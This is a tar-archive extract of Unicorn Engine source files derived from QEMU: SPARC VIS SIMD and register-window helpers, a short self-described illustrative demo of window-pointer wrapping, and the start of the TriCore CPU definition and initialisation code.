version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" /* This function uses non-native bit order */ #define GET_FIELD(X, FROM, TO) \ ((X) >> (63 - (TO)) & ((1ULL << ((TO) - (FROM) + 1)) - 1)) /* This function uses the order in the manuals, i.e. 
bit 0 is 2^0 */ #define GET_FIELD_SP(X, FROM, TO) \ GET_FIELD(X, 63 - (TO), 63 - (FROM)) target_ulong helper_array8(target_ulong pixel_addr, target_ulong cubesize) { return (GET_FIELD_SP(pixel_addr, 60, 63) << (17 + 2 * cubesize)) | (GET_FIELD_SP(pixel_addr, 39, 39 + cubesize - 1) << (17 + cubesize)) | (GET_FIELD_SP(pixel_addr, 17 + cubesize - 1, 17) << 17) | (GET_FIELD_SP(pixel_addr, 56, 59) << 13) | (GET_FIELD_SP(pixel_addr, 35, 38) << 9) | (GET_FIELD_SP(pixel_addr, 13, 16) << 5) | (((pixel_addr >> 55) & 1) << 4) | (GET_FIELD_SP(pixel_addr, 33, 34) << 2) | GET_FIELD_SP(pixel_addr, 11, 12); } #ifdef HOST_WORDS_BIGENDIAN #define VIS_B64(n) b[7 - (n)] #define VIS_W64(n) w[3 - (n)] #define VIS_SW64(n) sw[3 - (n)] #define VIS_L64(n) l[1 - (n)] #define VIS_B32(n) b[3 - (n)] #define VIS_W32(n) w[1 - (n)] #else #define VIS_B64(n) b[n] #define VIS_W64(n) w[n] #define VIS_SW64(n) sw[n] #define VIS_L64(n) l[n] #define VIS_B32(n) b[n] #define VIS_W32(n) w[n] #endif typedef union { uint8_t b[8]; uint16_t w[4]; int16_t sw[4]; uint32_t l[2]; uint64_t ll; float64 d; } VIS64; typedef union { uint8_t b[4]; uint16_t w[2]; uint32_t l; float32 f; } VIS32; uint64_t helper_fpmerge(uint64_t src1, uint64_t src2) { VIS64 s, d; s.ll = src1; d.ll = src2; /* Reverse calculation order to handle overlap */ d.VIS_B64(7) = s.VIS_B64(3); d.VIS_B64(6) = d.VIS_B64(3); d.VIS_B64(5) = s.VIS_B64(2); d.VIS_B64(4) = d.VIS_B64(2); d.VIS_B64(3) = s.VIS_B64(1); d.VIS_B64(2) = d.VIS_B64(1); d.VIS_B64(1) = s.VIS_B64(0); /* d.VIS_B64(0) = d.VIS_B64(0); */ return d.ll; } uint64_t helper_fmul8x16(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(r) * (int32_t)s.VIS_B64(r); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_W64(r) = tmp >> 8; PMUL(0); PMUL(1); PMUL(2); PMUL(3); #undef PMUL return d.ll; } uint64_t helper_fmul8x16al(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(1) * (int32_t)s.VIS_B64(r); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_W64(r) = tmp >> 8; PMUL(0); PMUL(1); PMUL(2); PMUL(3); #undef PMUL return d.ll; } uint64_t helper_fmul8x16au(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(0) * (int32_t)s.VIS_B64(r); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_W64(r) = tmp >> 8; PMUL(0); PMUL(1); PMUL(2); PMUL(3); #undef PMUL return d.ll; } uint64_t helper_fmul8sux16(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(r) * ((int32_t)s.VIS_SW64(r) >> 8); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_W64(r) = tmp >> 8; PMUL(0); PMUL(1); PMUL(2); PMUL(3); #undef PMUL return d.ll; } uint64_t helper_fmul8ulx16(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(r) * ((uint32_t)s.VIS_B64(r * 2)); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_W64(r) = tmp >> 8; PMUL(0); PMUL(1); PMUL(2); PMUL(3); #undef PMUL return d.ll; } uint64_t helper_fmuld8sux16(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(r) * ((int32_t)s.VIS_SW64(r) >> 8); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_L64(r) = tmp; /* Reverse calculation order to handle overlap */ PMUL(1); PMUL(0); #undef PMUL return d.ll; } uint64_t 
helper_fmuld8ulx16(uint64_t src1, uint64_t src2) { VIS64 s, d; uint32_t tmp; s.ll = src1; d.ll = src2; #define PMUL(r) \ tmp = (int32_t)d.VIS_SW64(r) * ((uint32_t)s.VIS_B64(r * 2)); \ if ((tmp & 0xff) > 0x7f) { \ tmp += 0x100; \ } \ d.VIS_L64(r) = tmp; /* Reverse calculation order to handle overlap */ PMUL(1); PMUL(0); #undef PMUL return d.ll; } uint64_t helper_fexpand(uint64_t src1, uint64_t src2) { VIS32 s; VIS64 d; s.l = (uint32_t)src1; d.ll = src2; d.VIS_W64(0) = s.VIS_B32(0) << 4; d.VIS_W64(1) = s.VIS_B32(1) << 4; d.VIS_W64(2) = s.VIS_B32(2) << 4; d.VIS_W64(3) = s.VIS_B32(3) << 4; return d.ll; } #define VIS_HELPER(name, F) \ uint64_t name##16(uint64_t src1, uint64_t src2) \ { \ VIS64 s, d; \ \ s.ll = src1; \ d.ll = src2; \ \ d.VIS_W64(0) = F(d.VIS_W64(0), s.VIS_W64(0)); \ d.VIS_W64(1) = F(d.VIS_W64(1), s.VIS_W64(1)); \ d.VIS_W64(2) = F(d.VIS_W64(2), s.VIS_W64(2)); \ d.VIS_W64(3) = F(d.VIS_W64(3), s.VIS_W64(3)); \ \ return d.ll; \ } \ \ uint32_t name##16s(uint32_t src1, uint32_t src2) \ { \ VIS32 s, d; \ \ s.l = src1; \ d.l = src2; \ \ d.VIS_W32(0) = F(d.VIS_W32(0), s.VIS_W32(0)); \ d.VIS_W32(1) = F(d.VIS_W32(1), s.VIS_W32(1)); \ \ return d.l; \ } \ \ uint64_t name##32(uint64_t src1, uint64_t src2) \ { \ VIS64 s, d; \ \ s.ll = src1; \ d.ll = src2; \ \ d.VIS_L64(0) = F(d.VIS_L64(0), s.VIS_L64(0)); \ d.VIS_L64(1) = F(d.VIS_L64(1), s.VIS_L64(1)); \ \ return d.ll; \ } \ \ uint32_t name##32s(uint32_t src1, uint32_t src2) \ { \ VIS32 s, d; \ \ s.l = src1; \ d.l = src2; \ \ d.l = F(d.l, s.l); \ \ return d.l; \ } #define FADD(a, b) ((a) + (b)) #define FSUB(a, b) ((a) - (b)) VIS_HELPER(helper_fpadd, FADD) VIS_HELPER(helper_fpsub, FSUB) #define VIS_CMPHELPER(name, F) \ uint64_t name##16(uint64_t src1, uint64_t src2) \ { \ VIS64 s, d; \ \ s.ll = src1; \ d.ll = src2; \ \ d.VIS_W64(0) = F(s.VIS_W64(0), d.VIS_W64(0)) ? 1 : 0; \ d.VIS_W64(0) |= F(s.VIS_W64(1), d.VIS_W64(1)) ? 2 : 0; \ d.VIS_W64(0) |= F(s.VIS_W64(2), d.VIS_W64(2)) ? 4 : 0; \ d.VIS_W64(0) |= F(s.VIS_W64(3), d.VIS_W64(3)) ? 8 : 0; \ d.VIS_W64(1) = d.VIS_W64(2) = d.VIS_W64(3) = 0; \ \ return d.ll; \ } \ \ uint64_t name##32(uint64_t src1, uint64_t src2) \ { \ VIS64 s, d; \ \ s.ll = src1; \ d.ll = src2; \ \ d.VIS_L64(0) = F(s.VIS_L64(0), d.VIS_L64(0)) ? 1 : 0; \ d.VIS_L64(0) |= F(s.VIS_L64(1), d.VIS_L64(1)) ? 2 : 0; \ d.VIS_L64(1) = 0; \ \ return d.ll; \ } #define FCMPGT(a, b) ((a) > (b)) #define FCMPEQ(a, b) ((a) == (b)) #define FCMPLE(a, b) ((a) <= (b)) #define FCMPNE(a, b) ((a) != (b)) VIS_CMPHELPER(helper_fcmpgt, FCMPGT) VIS_CMPHELPER(helper_fcmpeq, FCMPEQ) VIS_CMPHELPER(helper_fcmple, FCMPLE) VIS_CMPHELPER(helper_fcmpne, FCMPNE) uint64_t helper_pdist(uint64_t sum, uint64_t src1, uint64_t src2) { int i; for (i = 0; i < 8; i++) { int s1, s2; s1 = (src1 >> (56 - (i * 8))) & 0xff; s2 = (src2 >> (56 - (i * 8))) & 0xff; /* Absolute value of difference. */ s1 -= s2; if (s1 < 0) { s1 = -s1; } sum += s1; } return sum; } uint32_t helper_fpack16(uint64_t gsr, uint64_t rs2) { int scale = (gsr >> 3) & 0xf; uint32_t ret = 0; int byte; for (byte = 0; byte < 4; byte++) { uint32_t val; int16_t src = rs2 >> (byte * 16); int32_t scaled = src << scale; int32_t from_fixed = scaled >> 7; val = (from_fixed < 0 ? 0 : from_fixed > 255 ? 
255 : from_fixed); ret |= val << (8 * byte); } return ret; } uint64_t helper_fpack32(uint64_t gsr, uint64_t rs1, uint64_t rs2) { int scale = (gsr >> 3) & 0x1f; uint64_t ret = 0; int word; ret = (rs1 << 8) & ~(0x000000ff000000ffULL); for (word = 0; word < 2; word++) { uint64_t val; int32_t src = rs2 >> (word * 32); int64_t scaled = (int64_t)src << scale; int64_t from_fixed = scaled >> 23; val = (from_fixed < 0 ? 0 : (from_fixed > 255) ? 255 : from_fixed); ret |= val << (32 * word); } return ret; } uint32_t helper_fpackfix(uint64_t gsr, uint64_t rs2) { int scale = (gsr >> 3) & 0x1f; uint32_t ret = 0; int word; for (word = 0; word < 2; word++) { uint32_t val; int32_t src = rs2 >> (word * 32); int64_t scaled = (int64_t)src << scale; int64_t from_fixed = scaled >> 16; val = (from_fixed < -32768 ? -32768 : from_fixed > 32767 ? 32767 : from_fixed); ret |= (val & 0xffff) << (word * 16); } return ret; } uint64_t helper_bshuffle(uint64_t gsr, uint64_t src1, uint64_t src2) { union { uint64_t ll[2]; uint8_t b[16]; } s; VIS64 r; uint32_t i, mask, host; /* Set up S such that we can index across all of the bytes. */ #ifdef HOST_WORDS_BIGENDIAN s.ll[0] = src1; s.ll[1] = src2; host = 0; #else s.ll[1] = src1; s.ll[0] = src2; host = 15; #endif mask = gsr >> 32; for (i = 0; i < 8; ++i) { unsigned e = (mask >> (28 - i*4)) & 0xf; r.VIS_B64(i) = s.b[e ^ host]; } return r.ll; } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/win_helper.c��������������������������������������������������������0000664�0000000�0000000�00000024435�14675241067�0021061�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Helpers for CWP and PSTATE handling * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
*/ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" static inline void memcpy32(target_ulong *dst, const target_ulong *src) { dst[0] = src[0]; dst[1] = src[1]; dst[2] = src[2]; dst[3] = src[3]; dst[4] = src[4]; dst[5] = src[5]; dst[6] = src[6]; dst[7] = src[7]; } void cpu_set_cwp(CPUSPARCState *env, int new_cwp) { /* put the modified wrap registers at their proper location */ if (env->cwp == env->nwindows - 1) { memcpy32(env->regbase, env->regbase + env->nwindows * 16); } env->cwp = new_cwp; /* put the wrap registers at their temporary location */ if (new_cwp == env->nwindows - 1) { memcpy32(env->regbase + env->nwindows * 16, env->regbase); } env->regwptr = env->regbase + (new_cwp * 16); } target_ulong cpu_get_psr(CPUSPARCState *env) { helper_compute_psr(env); #if !defined(TARGET_SPARC64) return env->version | (env->psr & PSR_ICC) | (env->psref ? PSR_EF : 0) | (env->psrpil << 8) | (env->psrs ? PSR_S : 0) | (env->psrps ? PSR_PS : 0) | (env->psret ? PSR_ET : 0) | env->cwp; #else return env->psr & PSR_ICC; #endif } void cpu_put_psr_raw(CPUSPARCState *env, target_ulong val) { env->psr = val & PSR_ICC; #if !defined(TARGET_SPARC64) env->psref = (val & PSR_EF) ? 1 : 0; env->psrpil = (val & PSR_PIL) >> 8; env->psrs = (val & PSR_S) ? 1 : 0; env->psrps = (val & PSR_PS) ? 1 : 0; env->psret = (val & PSR_ET) ? 1 : 0; #endif env->cc_op = CC_OP_FLAGS; #if !defined(TARGET_SPARC64) cpu_set_cwp(env, val & PSR_CWP); #endif } /* Called with BQL held */ void cpu_put_psr(CPUSPARCState *env, target_ulong val) { cpu_put_psr_raw(env, val); #if !defined(TARGET_SPARC64) // cpu_check_irqs(env); #endif } int cpu_cwp_inc(CPUSPARCState *env, int cwp) { if (unlikely(cwp >= env->nwindows)) { cwp -= env->nwindows; } return cwp; } int cpu_cwp_dec(CPUSPARCState *env, int cwp) { if (unlikely(cwp < 0)) { cwp += env->nwindows; } return cwp; } #ifndef TARGET_SPARC64 void helper_rett(CPUSPARCState *env) { unsigned int cwp; if (env->psret == 1) { cpu_raise_exception_ra(env, TT_ILL_INSN, GETPC()); } env->psret = 1; cwp = cpu_cwp_inc(env, env->cwp + 1) ; if (env->wim & (1 << cwp)) { cpu_raise_exception_ra(env, TT_WIN_UNF, GETPC()); } cpu_set_cwp(env, cwp); env->psrs = env->psrps; } /* XXX: use another pointer for %iN registers to avoid slow wrapping handling ? */ void helper_save(CPUSPARCState *env) { uint32_t cwp; cwp = cpu_cwp_dec(env, env->cwp - 1); if (env->wim & (1 << cwp)) { cpu_raise_exception_ra(env, TT_WIN_OVF, GETPC()); } cpu_set_cwp(env, cwp); } void helper_restore(CPUSPARCState *env) { uint32_t cwp; cwp = cpu_cwp_inc(env, env->cwp + 1); if (env->wim & (1 << cwp)) { cpu_raise_exception_ra(env, TT_WIN_UNF, GETPC()); } cpu_set_cwp(env, cwp); } void helper_wrpsr(CPUSPARCState *env, target_ulong new_psr) { if ((new_psr & PSR_CWP) >= env->nwindows) { cpu_raise_exception_ra(env, TT_ILL_INSN, GETPC()); } else { /* cpu_put_psr may trigger interrupts, hence BQL */ cpu_put_psr(env, new_psr); } } target_ulong helper_rdpsr(CPUSPARCState *env) { return cpu_get_psr(env); } #else /* XXX: use another pointer for %iN registers to avoid slow wrapping handling ? */ void helper_save(CPUSPARCState *env) { uint32_t cwp; cwp = cpu_cwp_dec(env, env->cwp - 1); if (env->cansave == 0) { int tt = TT_SPILL | (env->otherwin != 0 ? 
(TT_WOTHER | ((env->wstate & 0x38) >> 1)) : ((env->wstate & 0x7) << 2)); cpu_raise_exception_ra(env, tt, GETPC()); } else { if (env->cleanwin - env->canrestore == 0) { /* XXX Clean windows without trap */ cpu_raise_exception_ra(env, TT_CLRWIN, GETPC()); } else { env->cansave--; env->canrestore++; cpu_set_cwp(env, cwp); } } } void helper_restore(CPUSPARCState *env) { uint32_t cwp; cwp = cpu_cwp_inc(env, env->cwp + 1); if (env->canrestore == 0) { int tt = TT_FILL | (env->otherwin != 0 ? (TT_WOTHER | ((env->wstate & 0x38) >> 1)) : ((env->wstate & 0x7) << 2)); cpu_raise_exception_ra(env, tt, GETPC()); } else { env->cansave++; env->canrestore--; cpu_set_cwp(env, cwp); } } void helper_flushw(CPUSPARCState *env) { if (env->cansave != env->nwindows - 2) { int tt = TT_SPILL | (env->otherwin != 0 ? (TT_WOTHER | ((env->wstate & 0x38) >> 1)) : ((env->wstate & 0x7) << 2)); cpu_raise_exception_ra(env, tt, GETPC()); } } void helper_saved(CPUSPARCState *env) { env->cansave++; if (env->otherwin == 0) { env->canrestore--; } else { env->otherwin--; } } void helper_restored(CPUSPARCState *env) { env->canrestore++; if (env->cleanwin < env->nwindows - 1) { env->cleanwin++; } if (env->otherwin == 0) { env->cansave--; } else { env->otherwin--; } } target_ulong cpu_get_ccr(CPUSPARCState *env) { target_ulong psr; psr = cpu_get_psr(env); return ((env->xcc >> 20) << 4) | ((psr & PSR_ICC) >> 20); } void cpu_put_ccr(CPUSPARCState *env, target_ulong val) { env->xcc = (val >> 4) << 20; env->psr = (val & 0xf) << 20; CC_OP = CC_OP_FLAGS; } target_ulong cpu_get_cwp64(CPUSPARCState *env) { return env->nwindows - 1 - env->cwp; } void cpu_put_cwp64(CPUSPARCState *env, int cwp) { if (unlikely(cwp >= env->nwindows || cwp < 0)) { cwp %= env->nwindows; } cpu_set_cwp(env, env->nwindows - 1 - cwp); } target_ulong helper_rdccr(CPUSPARCState *env) { return cpu_get_ccr(env); } void helper_wrccr(CPUSPARCState *env, target_ulong new_ccr) { cpu_put_ccr(env, new_ccr); } /* CWP handling is reversed in V9, but we still use the V8 register order. 
*/ target_ulong helper_rdcwp(CPUSPARCState *env) { return cpu_get_cwp64(env); } void helper_wrcwp(CPUSPARCState *env, target_ulong new_cwp) { cpu_put_cwp64(env, new_cwp); } static inline uint64_t *get_gregset(CPUSPARCState *env, uint32_t pstate) { if (env->def.features & CPU_FEATURE_GL) { return env->glregs + (env->gl & 7) * 8; } switch (pstate) { default: /* pass through to normal set of global registers */ case 0: return env->bgregs; case PS_AG: return env->agregs; case PS_MG: return env->mgregs; case PS_IG: return env->igregs; } } static inline uint64_t *get_gl_gregset(CPUSPARCState *env, uint32_t gl) { return env->glregs + (gl & 7) * 8; } /* Switch global register bank */ void cpu_gl_switch_gregs(CPUSPARCState *env, uint32_t new_gl) { uint64_t *src, *dst; src = get_gl_gregset(env, new_gl); dst = get_gl_gregset(env, env->gl); if (src != dst) { memcpy32(dst, env->gregs); memcpy32(env->gregs, src); } } void helper_wrgl(CPUSPARCState *env, target_ulong new_gl) { cpu_gl_switch_gregs(env, new_gl & 7); env->gl = new_gl & 7; } void cpu_change_pstate(CPUSPARCState *env, uint32_t new_pstate) { uint32_t pstate_regs, new_pstate_regs; uint64_t *src, *dst; if (env->def.features & CPU_FEATURE_GL) { /* PS_AG, IG and MG are not implemented in this case */ new_pstate &= ~(PS_AG | PS_IG | PS_MG); env->pstate = new_pstate; return; } pstate_regs = env->pstate & 0xc01; new_pstate_regs = new_pstate & 0xc01; if (new_pstate_regs != pstate_regs) { /* Switch global register bank */ src = get_gregset(env, new_pstate_regs); dst = get_gregset(env, pstate_regs); memcpy32(dst, env->gregs); memcpy32(env->gregs, src); } env->pstate = new_pstate; } void helper_wrpstate(CPUSPARCState *env, target_ulong new_state) { cpu_change_pstate(env, new_state & 0xf3f); if (cpu_interrupts_enabled(env)) { // cpu_check_irqs(env); } } void helper_wrpil(CPUSPARCState *env, target_ulong new_pil) { env->psrpil = new_pil; if (cpu_interrupts_enabled(env)) { // cpu_check_irqs(env); } } void helper_done(CPUSPARCState *env) { trap_state *tsptr = cpu_tsptr(env); env->pc = tsptr->tnpc; env->npc = tsptr->tnpc + 4; cpu_put_ccr(env, tsptr->tstate >> 32); env->asi = (tsptr->tstate >> 24) & 0xff; cpu_change_pstate(env, (tsptr->tstate >> 8) & 0xf3f); cpu_put_cwp64(env, tsptr->tstate & 0xff); if (cpu_has_hypervisor(env)) { uint32_t new_gl = (tsptr->tstate >> 40) & 7; env->hpstate = env->htstate[env->tl]; cpu_gl_switch_gregs(env, new_gl); env->gl = new_gl; } env->tl--; if (cpu_interrupts_enabled(env)) { // cpu_check_irqs(env); } } void helper_retry(CPUSPARCState *env) { trap_state *tsptr = cpu_tsptr(env); env->pc = tsptr->tpc; env->npc = tsptr->tnpc; cpu_put_ccr(env, tsptr->tstate >> 32); env->asi = (tsptr->tstate >> 24) & 0xff; cpu_change_pstate(env, (tsptr->tstate >> 8) & 0xf3f); cpu_put_cwp64(env, tsptr->tstate & 0xff); if (cpu_has_hypervisor(env)) { uint32_t new_gl = (tsptr->tstate >> 40) & 7; env->hpstate = env->htstate[env->tl]; cpu_gl_switch_gregs(env, new_gl); env->gl = new_gl; } env->tl--; if (cpu_interrupts_enabled(env)) { // cpu_check_irqs(env); } } #endif 
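/*
 * Illustrative model (not part of the original tree): a host-side sketch of
 * the window-pointer arithmetic implemented by cpu_cwp_inc/cpu_cwp_dec and
 * the WIM checks in helper_save/helper_restore above. NWINDOWS, the WIM
 * value, and the printout are assumptions for the demo; the engine itself
 * raises TT_WIN_OVF/TT_WIN_UNF via cpu_raise_exception_ra instead.
 */
#include <stdio.h>

#define NWINDOWS 8            /* assumed sparc32 configuration */
#define WIM (1u << 0)         /* window 0 marked invalid, as boot code would */

static int cwp_inc(int cwp) { return cwp >= NWINDOWS ? cwp - NWINDOWS : cwp; }
static int cwp_dec(int cwp) { return cwp < 0 ? cwp + NWINDOWS : cwp; }

int main(void)
{
    int cwp = NWINDOWS - 1, i;
    /* 'save' decrements CWP; entering the WIM-invalid window is an overflow */
    for (i = 0; i < NWINDOWS; i++) {
        int next = cwp_dec(cwp - 1);
        if (WIM & (1u << next)) {
            printf("save #%d: TT_WIN_OVF entering cwp=%d\n", i, next);
            break;
        }
        cwp = next;
    }
    /* 'restore'/'rett' increment CWP and wrap modulo NWINDOWS the same way */
    printf("cwp_inc(%d + 1) wraps to %d\n", NWINDOWS - 1, cwp_inc(NWINDOWS));
    return 0;
}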
unicorn-2.1.1/qemu/target/tricore/
unicorn-2.1.1/qemu/target/tricore/cpu-param.h
/* * TriCore cpu parameters for qemu. * * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * SPDX-License-Identifier: LGPL-2.1+ */ #ifndef TRICORE_CPU_PARAM_H #define TRICORE_CPU_PARAM_H 1 #define TARGET_LONG_BITS 32 #define TARGET_PAGE_BITS 14 #define TARGET_PHYS_ADDR_SPACE_BITS 32 #define TARGET_VIRT_ADDR_SPACE_BITS 32 #define NB_MMU_MODES 3 #endif
unicorn-2.1.1/qemu/target/tricore/cpu-qom.h
/* * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #ifndef QEMU_TRICORE_CPU_QOM_H #define QEMU_TRICORE_CPU_QOM_H #include "hw/core/cpu.h" #define TYPE_TRICORE_CPU "tricore-cpu" #define TRICORE_CPU(obj) ((TriCoreCPU *)obj) #define TRICORE_CPU_CLASS(klass) ((TriCoreCPUClass *)klass) #define TRICORE_CPU_GET_CLASS(obj) (&((TriCoreCPU *)obj)->cc) typedef struct TriCoreCPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ void (*parent_reset)(CPUState *cpu); } TriCoreCPUClass; #endif /* QEMU_TRICORE_CPU_QOM_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/cpu.c�������������������������������������������������������������0000664�0000000�0000000�00000011625�14675241067�0020050�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * TriCore emulation for qemu: main translation routines. * * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
*/ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #include "qemu/osdep.h" #include "cpu.h" #include "cpu-qom.h" #include "exec/exec-all.h" #include <uc_priv.h> static inline void set_feature(CPUTriCoreState *env, int feature) { env->features |= 1ULL << feature; } static void tricore_cpu_set_pc(CPUState *cs, vaddr value) { TriCoreCPU *cpu = TRICORE_CPU(cs); CPUTriCoreState *env = &cpu->env; env->PC = value & ~(target_ulong)1; } static void tricore_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) { TriCoreCPU *cpu = TRICORE_CPU(cs); CPUTriCoreState *env = &cpu->env; env->PC = tb->pc; } static void tricore_cpu_reset(CPUState *dev) { CPUState *s = CPU(dev); TriCoreCPU *cpu = TRICORE_CPU(s); TriCoreCPUClass *tcc = TRICORE_CPU_GET_CLASS(cpu); CPUTriCoreState *env = &cpu->env; tcc->parent_reset(dev); memset(env, 0, offsetof(CPUTriCoreState, end_reset_fields)); cpu_state_reset(env); } static bool tricore_cpu_has_work(CPUState *cs) { return true; } static void tricore_cpu_realizefn(CPUState *dev) { CPUState *cs = CPU(dev); TriCoreCPU *cpu = TRICORE_CPU(dev); CPUTriCoreState *env = &cpu->env; cpu_exec_realizefn(cs); /* Some features automatically imply others */ if (tricore_feature(env, TRICORE_FEATURE_161)) { set_feature(env, TRICORE_FEATURE_16); } if (tricore_feature(env, TRICORE_FEATURE_16)) { set_feature(env, TRICORE_FEATURE_131); } if (tricore_feature(env, TRICORE_FEATURE_131)) { set_feature(env, TRICORE_FEATURE_13); } cpu_reset(cs); } static void tricore_cpu_initfn(struct uc_struct *uc, CPUState *obj) { TriCoreCPU *cpu = TRICORE_CPU(obj); CPUTriCoreState *env = &cpu->env; env->uc = uc; cpu_set_cpustate_pointers(cpu); } static void tc1796_initfn(CPUState *obj) { TriCoreCPU *cpu = TRICORE_CPU(obj); set_feature(&cpu->env, TRICORE_FEATURE_13); } static void tc1797_initfn(CPUState *obj) { TriCoreCPU *cpu = TRICORE_CPU(obj); set_feature(&cpu->env, TRICORE_FEATURE_131); } static void tc27x_initfn(CPUState *obj) { TriCoreCPU *cpu = TRICORE_CPU(obj); set_feature(&cpu->env, TRICORE_FEATURE_161); } static void tricore_cpu_class_init(CPUClass *c) { TriCoreCPUClass *mcc = TRICORE_CPU_CLASS(c); CPUClass *cc = CPU_CLASS(c); /* parent class is CPUClass, parent_reset() is cpu_common_reset(). 
*/ mcc->parent_reset = cc->reset; cc->reset = tricore_cpu_reset; cc->has_work = tricore_cpu_has_work; cc->set_pc = tricore_cpu_set_pc; cc->synchronize_from_tb = tricore_cpu_synchronize_from_tb; cc->get_phys_page_debug = tricore_cpu_get_phys_page_debug; cc->tlb_fill_cpu = tricore_cpu_tlb_fill; cc->tcg_initialize = tricore_tcg_init; } #define DEFINE_TRICORE_CPU_TYPE(cpu_model, initfn) \ { \ .parent = TYPE_TRICORE_CPU, \ .initfn = initfn, \ .name = TRICORE_CPU_TYPE_NAME(cpu_model), \ } struct TriCoreCPUInfo { const char *name; void (*initfn)(CPUState *obj); }; static struct TriCoreCPUInfo tricore_cpus_type_infos[] = { { "tc1796", tc1796_initfn }, { "tc1797", tc1797_initfn }, { "tc27x", tc27x_initfn }, }; TriCoreCPU *cpu_tricore_init(struct uc_struct *uc) { TriCoreCPU *cpu; CPUState *cs; CPUClass *cc; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } if (uc->cpu_model == INT_MAX) { uc->cpu_model = 2; // tc27x } else if (uc->cpu_model >= ARRAY_SIZE(tricore_cpus_type_infos)) { free(cpu); return NULL; } cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = cs; cpu_class_init(uc, cc); tricore_cpu_class_init(cc); cpu_common_initfn(uc, cs); tricore_cpu_initfn(uc, cs); tricore_cpus_type_infos[uc->cpu_model].initfn(cs); tricore_cpu_realizefn(cs); // init address space cpu_address_space_init(cs, 0, cs->memory); qemu_init_vcpu(cs); return cpu; } �����������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/cpu.h�������������������������������������������������������������0000664�0000000�0000000�00000022340�14675241067�0020051�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * TriCore emulation for qemu: main CPU struct. * * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. 